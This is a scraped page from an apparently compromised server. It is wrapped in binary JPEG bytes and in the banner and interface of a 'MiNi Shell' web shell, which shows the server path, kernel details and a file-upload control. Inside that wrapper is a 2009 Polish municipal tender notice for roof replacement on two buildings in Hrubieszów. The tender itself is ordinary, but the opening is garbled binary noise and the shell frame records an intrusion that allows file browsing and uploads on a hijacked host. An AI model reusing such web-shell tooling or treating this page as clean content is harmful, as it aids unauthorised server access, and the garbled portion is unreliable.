JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090821/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090821/138037-N-2009.html

<p class="kh_header"><b>Hrubieszów: WYMIANA POKRYCIA  DACHOWEGO  NA 2-CH  BUDYNKACH MIESZKALNYCH  PRZY UL. PIŁSUDSKIEGO NR 9 i 22 
-STANOWIĄCYCH WŁASNOŚĆ GMINY MIEJSKIEJ HRUBIESZÓW</b><br>
<b>Numer ogłoszenia: 138037 - 2009; data zamieszczenia: 21.08.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Hrubieszów , ul. mjr H. Dobrzańskiego "Hubala" 1, 22-500 Hrubieszów, woj. lubelskie, tel. 084 6962380 w. 54, faks 084 6962380.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.miasto.hrubieszow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> WYMIANA POKRYCIA  DACHOWEGO  NA 2-CH  BUDYNKACH MIESZKALNYCH  PRZY UL. PIŁSUDSKIEGO NR 9 i 22 
-STANOWIĄCYCH WŁASNOŚĆ GMINY MIEJSKIEJ HRUBIESZÓW.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są roboty budowlane polegające na wymianie pokrycia dachowego na dwóch budynkach mieszkalnych stanowiących własność Gminy Miejskiej Hrubieszów,  odrębnie dla każdego budynku jn:
 
ZADANIE NR.1  
Wymiana pokrycia dachowego budynku mieszkalnego przy ulicy Piłsudskiego 9 
z  zakresem j.n.:
1.	Rozebranie pokrycia dachowego z blachy    -  278.73 m2
2.	Rozebranie rynien i rur dachowych -  68,42 mb
3.	Przebudowa  kominów dymowych - 2,987 m3
4.	Sprawdzenie przewodów dymowych -  36,00 mb
5.	Odgruzowanie  przewodów  kominowych - 7,20 mb
6.	Uzupełnienie  tynków  na  kominach   -  8,064 m2
7.	Osadzenie  kratek  wentylacyjnych  -  32,0 szt.
8.	Wymiana  czapek  kominowych    -  2,504 m2
9.	Wykonanie obróbek blacharskich z blachy powlekanej - 76,124 m2
10.	Wymiana  elem. konstrukcyjnych  dachu  - 1,35 m3
11.	Wymiana  ołacenia połaci dachowych - 83,62 m2
12.	Ułożenie folii pod pokrycie z blachy - 278,733 m2
13.	Krycie dachu blachą  powlekaną  płaską  na  rąbek - 278,733  m2
14.	Montaż rynien i rur spustowych -  68,42 mb
15.	Wywiezienie  gruzu  na  odległość  2 km. -  0,202 m3 
  
  
ZADANIE NR.2 

Wymiana pokrycia dachowego budynku mieszkalnego przy ulicy  Piłsudskiego  22 
z zakresem j.n.:
1.	Rozebranie pokrycia dachowego z płyt  azbest.-cement. z  utylizacją -  192,76 m2
2.	Rozebranie rur i rynien dachowych - 40,10 mb
3.	Przebudowa  kominów dymowych  -  1,14 m3
4.	Wykonanie tynków  na  kominach  ponad  dachem  -  12,48 m2
5.	Wykonanie  czapek  kominowych  -  2,12 m2
6.	Wymiana  elem.  konstrukcyjnych dachu (krokwie, słupki, murłaty )  - 92,20 mb
7.	Wzmocnienie  krokwi  deskami  dwustronnie  - 49,60 mb
8.	Wymiana  desek  czołowych  -  33,20 mb
9.	Wykonanie obróbek blacharskich z blachy powlekanej -  23,61 m2
10.	Wykonanie ołacenia połaci dachowych -  198,70 m2
11.	Ułożenie folii pod pokrycie z blachy  -  198,70 m2
12.	Wykonanie  podbitki  okapu  z  paneli   PCV  -  27,08 m2
13.	Krycie dachu blachą trapezową powlekaną - 198,70 m2
14.	Montaż gąsiorów             -  14,90 mb
15.	Montaż rynien i rur spustowych -  42,10 mb
16.	 Bariery śniegowe - 32,00 mb
17.	Wpuszczenie  rur  kwasoodpornych  w  przewody  dymowe -  42,0 mb
18.	Obmurowanie  rur  kwasoodpornych  cegłą  -  1,48 m3
19.	Rozebranie  kominów ( świnek ) z  cegły  -  4,50 m3
20.	Wywóz  gruzu  na  odl. 2 km    -  6,00 m3  


Szczegółowy zakres robót określa załączony do SIWZ kosztorys ofertowy.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.26.00.00-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 2.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> nie przewiduje się wnoszenia wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Wykonawca składający ofertę musi spełniać następujące warunki:
-	Posiadać uprawnienia do wykonania zamówienia 
-	Posiadać niezbędną wiedzę i doświadczenie oraz dysponować potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawić pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia na czas realizacji zamówienia
-	Znajdować się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia 
-	Nie podlegać wykluczeniu z postępowania o udzielenie zamówienia 
-	Spełniać wszystkie wymagania określone ustawą Prawo zamówień publicznych oraz niniejszą Specyfikacją.
Ocena spełnienia przez Wykonawcę powyższych warunków będzie dokonana przy zastosowaniu kryterium spełnia - nie spełnia. (podstawą do oceny będą złożone dokumenty wykazane w pkt VIII  1.1. do 1.8  SIWZ).</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Dokumenty potwierdzające spełnienie warunków udziału w postępowaniu oraz inne dokumenty wymagane od wykonawców:
W celu potwierdzenia spełnienia warunków udziału w postępowaniu, każdy z Wykonawców powinien przedłożyć wraz z ofertą następujące dokumenty:
1.1.	wypełniony formularz ofertowy (załącznik nr 1),
1.2.	aktualny odpis z właściwego rejestru albo zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej (wystawionego nie wcześniej niż 6 miesięcy przed upływem składania ofert),
1.3.	wykaz osób i podmiotów, które będą wykonywać zamówienie wraz z informacjami na temat ich kwalifikacji niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności, przedstawiony na załączniku nr 4, oraz odpis lub kopia uprawnień oraz zaświadczenie o przynależności do Izby Inżynierów Budownictwa wszystkich osób biorących udział w realizacji zamówienia.
1.4.	aktualne zaświadczenie właściwego Naczelnika Urzędu Skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem składania ofert,
1.5.	oświadczenie złożone na formularzu ofertowym (załącznik nr 1), że prace objęte zamówieniem Wykonawca wykona we własnym zakresie lub w przypadku uczestnictwa podwykonawców przedstawienie informacji o ich udziale na załączniku nr 5,
1.6.	oświadczenie w trybie Art. 22 ust.1 załącznik nr 6
1.7.	Kosztorys ofertowy 
1.8.	 zaakceptowany wzór umowy - załącznik nr.3.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.miasto.hrubieszow.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta w Hrubieszowie - Wydział Gospodarki Mieniem Komunalnym i Ochrony Środowiska - ul. 3-go Maja 15 ( tel. 084 696 2380 w.56).</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.09.2009 godzina 09:00, miejsce: Gmina Miejska Hrubieszów - sekretariat
ul. Mjr H. Dobrzańskiego Hubala 1
22-500 Hrubieszów.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> ZADANIE NR.1  
Wymiana pokrycia dachowego budynku mieszkalnego przy ulicy Piłsudskiego 9.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są roboty budowlane polegające na wymianie pokrycia dachowego z  zakresem j.n.: 1.	Rozebranie pokrycia dachowego z blachy    -  278.73 m2
2.	Rozebranie rynien i rur dachowych -  68,42 mb
3.	Przebudowa  kominów dymowych - 2,987 m3
4.	Sprawdzenie przewodów dymowych -  36,00 mb
5.	Odgruzowanie  przewodów  kominowych - 7,20 mb
6.	Uzupełnienie  tynków  na  kominach   -  8,064 m2
7.	Osadzenie  kratek  wentylacyjnych  -  32,0 szt.
8.	Wymiana  czapek  kominowych    -  2,504 m2
9.	Wykonanie obróbek blacharskich z blachy powlekanej - 76,124 m2
10.	Wymiana  elem. konstrukcyjnych  dachu  - 1,35 m3
11.	Wymiana  ołacenia połaci dachowych - 83,62 m2
12.	Ułożenie folii pod pokrycie z blachy - 278,733 m2
13.	Krycie dachu blachą  powlekaną  płaską  na  rąbek - 278,733  m2
14.	Montaż rynien i rur spustowych -  68,42 mb
15.	Wywiezienie  gruzu  na  odległość  2 km. -  0,202 m3.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.26.00.00-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 2.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Wymiana pokrycia dachowego budynku mieszkalnego przy ulicy  Piłsudskiego  22.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są roboty budowlane polegające na wymianie pokrycia dachowego  z  zakresem jn: 1.	Rozebranie pokrycia dachowego z płyt  azbest.-cement. z  utylizacją -  192,76 m2
2.	Rozebranie rur i rynien dachowych - 40,10 mb
3.	Przebudowa  kominów dymowych  -  1,14 m3
4.	Wykonanie tynków  na  kominach  ponad  dachem  -  12,48 m2
5.	Wykonanie  czapek  kominowych  -  2,12 m2
6.	Wymiana  elem.  konstrukcyjnych dachu (krokwie, słupki, murłaty )  - 92,20 mb
7.	Wzmocnienie  krokwi  deskami  dwustronnie  - 49,60 mb
8.	Wymiana  desek  czołowych  -  33,20 mb
9.	Wykonanie obróbek blacharskich z blachy powlekanej -  23,61 m2
10.	Wykonanie ołacenia połaci dachowych -  198,70 m2
11.	Ułożenie folii pod pokrycie z blachy  -  198,70 m2
12.	Wykonanie  podbitki  okapu  z  paneli   PCV  -  27,08 m2
13.	Krycie dachu blachą trapezową powlekaną - 198,70 m2
14.	Montaż gąsiorów             -  14,90 mb
15.	Montaż rynien i rur spustowych -  42,10 mb
16.	 Bariery śniegowe - 32,00 mb
17.	Wpuszczenie  rur  kwasoodpornych  w  przewody  dymowe -  42,0 mb
18.	Obmurowanie  rur  kwasoodpornych  cegłą  -  1,48 m3
19.	Rozebranie  kominów ( świnek ) z  cegły  -  4,50 m3
20.	Wywóz  gruzu  na  odl. 2 km    -  6,00 m3.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.26.00.00-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 2.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com